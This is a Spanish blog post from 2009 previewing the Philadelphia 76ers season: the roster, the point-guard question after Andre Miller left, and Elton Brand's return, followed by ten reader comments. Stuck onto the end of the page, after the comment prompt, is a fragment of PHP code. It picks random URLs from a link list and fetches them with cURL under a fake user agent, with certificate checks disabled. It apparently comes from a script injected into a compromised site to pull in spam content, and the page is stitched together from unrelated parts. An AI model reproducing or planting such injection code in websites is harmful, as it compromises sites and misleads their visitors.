Philadelphia 76ers: Remezclando los ingredientes

10 de October de 2009 por txusma

El año pasado se presentaba glorioso para los Sixers. En la temporada 2007/2008 habían forzado el séptimo partido en la primera ronda de playoffs contra los todopoderosos Celtics y en verano se habían reforzado con Elton Brand. A pesar de que el ex-Clippers llegaba después de una gravísima lesión en el tendón de Aquiles que le había hecho perderse la mayoría de partidos de la temporada anterior, era la cerecita que coronaba un pastel creado para las cotas más altas. Desgraciadamente, las buenas sensaciones no duraron mucho. Brand no empezó realmente la temporada al 100% y el equipo técnico no le encontró acomodo en el equipo. De hecho, la sensación era que los Sixers jugaban mejor (y ganaban) cuando Brand no estaba en la pista. La situación se volvió insostenible tras una derrota en casa frente a los Cavs en los que sólo fueron capaces de anotar 72 puntos. Tras el partido, Mo Cheeks fue despedido y el marrón le caía al interino Tony DiLeo. 3 partidos después, Elton Brand se dislocó el hombro al caer en la lucha por un rebote y aclaró un poco la situación. Aunque siguió jugado mermado un tiempo más, a principios de febrero dio por finalizada la temporada para operarse. Causa o efecto, desde ese momento los Sixers ganaron 32 de los 59 partidos que jugaron y se clasificaron para Playoffs con mejor balance que el año anterior.

Se inicia una nueva temporada y de nuevo hay cambio de entrenador. Esta vez será Eddie Jordan el que guie a los Iguodala, Young, Williams y compañía hacía el éxito. Suyo será el trabajo de integrar a Brand en el equipo sin perder su principal característica de los últimos años: el contraataque.

Pero más importante que el cambio de entrenador es el cambio en la posición del puesto de base: el reloj Andre Miller, después de jugar 121 partidos consecutivos en los Sixers, abandonaba la franquicia durante el verano rumbo a Portland. A cambio llegaba… nadie. Eddie Jordan, acostumbrado a jugar con un semi-base como Arenas en esa posición debe haber pensado que para su estilo de juego no era necesario tener a un base con mayúsculas como Miller sino que con un “tiro-primero-miro-después” como Louis Williams ya cumple perfectamente la papeleta. El de Memphis se encuentra, sin duda, ante la oportunidad de su vida. Como suplentes aparecen Willie Green (aún más “tiro-primero” que Williams), Royal Ivey y Jrue Holiday, su elección en primera ronda del draft. Puede parecer extraño que en un equipo sin base definido, el base escogido en el draft no parezca que vaya a gozar de muchas oportunidades pero es que Holiday llega a la liga muy verde pero con potencial tremendo. Ahora mismo no podemos esperar de él más de 10 minutos de intensísima defensa porque si en algo destaca es precisamente cuando el balón lo tiene el adversario. De toda manera si la evolución es buena, quien sabe si lo veremos adelantando a Willie Green en la rotación.

En las alas 2 jugadores casi calcados, Andre Iguodala y Thaddeus Young. Puro físico, pura fuerza, pura velocidad que aseguran contrataques a altísimo ritmo. Iguodala además mejora día a día en el tiro y es también muy regular. Apuesto a que este año, a poco que los Sixers vayan bien, será All-Stars. Ahí queda eso. En estas posiciones encontramos la incorporación clave del verano. Jason Kapono llega a Philadelphia para aportar tiro exterior a un equipo que adolece de él desde que se fuera Kyle Korver. Rodney Carney será el cuarto jugador, otra copia de Iguodala y Young pero con menos calidad.

Y el juego interior tampoco es moco de pavo. Elton Brand parece que está vez sí vuelve totalmente recuperado a las canchas y con hambre de victorias. Su presencia será fundamental en defensa y en aspecto reboteador. No esperemos un 20-10 pero si cifras bastante cercanas. A su lado, Samuel Dalembert, intentará recuperar el nivel perdido la temporada pasada y volver a ser aquel jugador capaz de anotar 10 puntos, recoger 10 rebotes y poner 2 tapones por noche. Marresse Speights, jugador de segundo año que ya disfrutó de bastante minutos el año pasado con buenas actuaciones, y Jason Smith, que vuelva tras un año parado por lesión, completarán la rotación.

Si algo bueno tiene este equipo es que son atléticamente superiores, capaces de jugar cualquier partido a un ritmo muy alto y, lo más importante, capaces de aguantar esta intensidad durante toda la temporada. La defensa y el contrataque serán sus principales armas porque aparte de Kapono e Iguodala el resto de jugadores no destacan por poseer un gran tiro. Veremos si todos estos ingredientes acaban cuajando.

Quinteto: Louis Williams, Andre Iguodala, Thaddeus Young, Elton Brand, Samuel Dalembert
6º hombre: Jason Kapono

Pronóstico: Primera e incluso segunda ronda de Playoffs

Comenta

10 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Me gusta Eddie Jordan y creo que tiene una plantilla bastante acorde con su estilo, pero si Arenas vuelve a buen nivel creo que la conferencia se pone muy cara para los Sixers. Lo mismo se podria decir de Brand…no se, la verdad es que tengo muchas dudas en quien será el 8º clasificado del Este.

      Citar

  2. Dantley2 dice:
    #2

    Muchas incógnitas, no? La obvia es el estado de salud de Brand, si es el Brand de hace tres años, los Sixers son equipo de playoffs. La otra incógnita es si Lou Williams será capaz de dirigir al equipo. Capacidad anotadora tiene, es una especie de Monta Ellis, pero en un equipo con Brand, Iguodala y Thaddeus Young, que fuera Williams el que se las juega, sería terrible.

    Para mi gusto, les falta banquillo. Kapono de especialista vale, Speights irá para arriba porque es muy bueno pero ya miras más hacia el fondo de armario y es muy poco lo que ofrecen salvo que Holiday aprenda rapidísimo, que no lo veo probable, o que Jason Smith esté 100% recuperado y siga apuntando maneras.

      Citar

  3. Viva_Dirk dice:
    #3

    Se me ha olvidado comentar que a mi no me parece que Holiday esté tan verde, espero verle entre 10 y 15 minutos en casi todos los partidos.

      Citar

  4. sergio dice:
    #4

    Pues a mi este equipo me encanta y me da buenas sensaciones siempre que lo veo jugar. Eso si, creo que es un equipo que llega hasta donde tiene que llegar (Playoffs) y a partir de ahi poco pueden hacer para superar a los equipos punteros de su Conferencia (vease Cavs, Celtics o Magic). Todo eso puede cambiar si la gente de la que se espera algo mas en este equipo como Brand o Holliday (sin la misma carga de presion claro…) responden y ayudan en momentos puntuales.

    Sinceramente es un equipo que ahora mismo me cae bien y les deseo lo mejor. Esa lucha y regularidad se tienen que ver recompensadas de algun modo.

    Muy buen fichaje el de Kapono para aprovechar las superioridades que crea Iguodala

      Citar

  5. CAMPO2 dice:
    #5

    Hola es la primera vez que dejo un comentario en esta gran web dedicada a la NBA.

    Creo que este año las 2 ultimas plazas de play off del este van ha estar carisimas con equipos como Wizards, Sixers, Detroit, Toronto y Miami. Luego pasara lo de siempre que a Wizards se les lesiona hasta el de la mopa, que Sixers sin un base puro no sabe jugar en estatico en Detroit no saben como sacr partido de R.I.P: y Gordon, en Toronto Bosh piensa en 2010 y en Miami Wade se cansa de jugar a los Superheroes y si a est o le añades el tipico equipo que da la sorpresa(Charlotte con el tio Larry al mano o unos Knicks que les de por defender) habra navajazos para estar en post temporada.

    Demis Nets no espero gran cosa

      Citar

  6. Dantley2 dice:
    #6

    Viva, fíjate el papel de Holiday en la NCAA, muy muy verde. No digo que no tenga futuro, no lo sé, pero presente no tiene. De hecho lo lógico habria sido fichar a un base base y tener a Holiday aprendiendo a ratos en la NBA, a ratos en la NBDL

    Bienvenido Campo2 ¡¡¡

      Citar

  7. Jabho dice:
    #7

    Va a ser una pelea bonita fuera de los 3 primeros del Este. Veo a los Sixers en PO pero no estaría de más que se hicieran con un basecito veterano que les de algunos minutos de base de verdad. Aun así los veo más dentro que los Pistons por poner un ejemplo y con poco que envidiar a Wizars, Raptors o Heat

    Un equipo de mucho highlight

      Citar

  8. Óscar dice:
    #8

    Los Sixers de este año me parecen un gran equipo, muy atractivo, pero con una duda grande tras la (bendita) marcha de Andre Miller a Portland: el puesto de base. Es el momento de Louis Williams, que no es un gran asistente pero sí un buen base para contraataque y juego rápido, y que creo que mejorará mucho su juego con más minutos, globalmente y sobre todo sus porcentajes de tiro. Un jugador que necesita sentirse importante y algo más que el sexto hombre. Con E.Jordan encontrará ese protagonismo y compensará la experiencia y control de Miller con un juego más físico y dinámico. Esa parece la apuesta para estar entre los 5 primeros del Este, que creo que lograrán si no pasa nada raro, tipo lesión de E.Brand.

    Además de Lou, hay que seguir a Speights, que dejó una gran impresión en su año rookie pese a tener perros viejos por delante como Reggie Evans o Theo Ratliff (ambos se han ido). Para compensar esas marchas, están con Stromile Swift a prueba, tras descartarlo Portland hace unas semanas. Un Speights que quiere cerrar el círculo de pívots de Florida U. de los úñtimos años en la NBA: David Lee, Al Horford, Joakim Noah y ahora él. Vaya hornada.

    No tenía claro cuál va a ser el cinco inicial, por lo que veo en los paridos de pre-season (van 3-0) parece que es el que apunta Txusma: Williams-Iguolada-Young-Brand-Dalembert. Un quinteto que puede ser el de más estatura media de la Liga, habrá que mirarlo. La lesión de Brand el año pasado hizo que Thaddeus Young acabase jugando más de “4” que de “3”, con buen resultado por cierto. Iguolada pasó a jugar de alero casi todos los minutos y Willie Green de “2” titular. PHI va a tener muchos jugadores versátiles, por lo que les puede ir bien. Comparto la impresión de Dantley sobre el banquillo, les puede faltar algo pero al menos tiene buenos especialistas: Ivey (defensa ext), Speights (defensa y físico interior), Kapono (tiro) o el cumplidor Green. Jason Smith jugará pocos minutos tras su larga lesión y Brezec, Carney o Chirstmas (no “drafteado”) completarán la plantilla. Está por ver si se quedan con Bowman, Swift o Singletary (que si os acordáis ha pasado por cuatro equipos en un año aprox., sin asentarse en ninguno).

    En cuanto a Holiday, es tan grande su potencial (sobre todo físico) como la duda de si a sus 19 años recién cumplidos está preparado para jugar siquiera unos minutos por partido. Le ayudará la falta de bases puros en el equipo, pero creo que los Sixers lo han escogido como una clara apuesta de futuro.

      Citar

  9. Dantley2 dice:
    #9

    Óscar, no sabía que Christmas andaba en los Sixers, me extrañó mucho no verlo drafteado. Puede ser un buen 9º o 10º hombre.

    Speights me gusta mucho, para mi gusto lo que le falta es sangre, sí es capaz de mentalizarse será un gran recambio interior y un titular perenne en su carrera NBA, pero no sé, parece como si jugara sin ganas.

      Citar

  10. Óscar dice:
    #10

    Sí, a mí me parece también un poco frío, le cuesta enrar en el partido pero cuando se pone… De hecho, DiLeo había partidos que no le sacaba casi nada porque se venía abajo tras un fallo, pero en muchas ocasiones si estaba enchufado jugaba los últimos minutos en vez de Young, Evans, Ratliff o el propio Dalembert. Tiene mucho potencial: rebotea, tapona, tiene un gran “timing” de salto y físicamente es la leche. Anota mucho tras rebote ofensivo, pero tiene buenos movimientos. Este año tendrá muchos más minutos y debe subir como la espuma, pero es verdad que le falta esa sangre o instinto. Este año es el suyo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>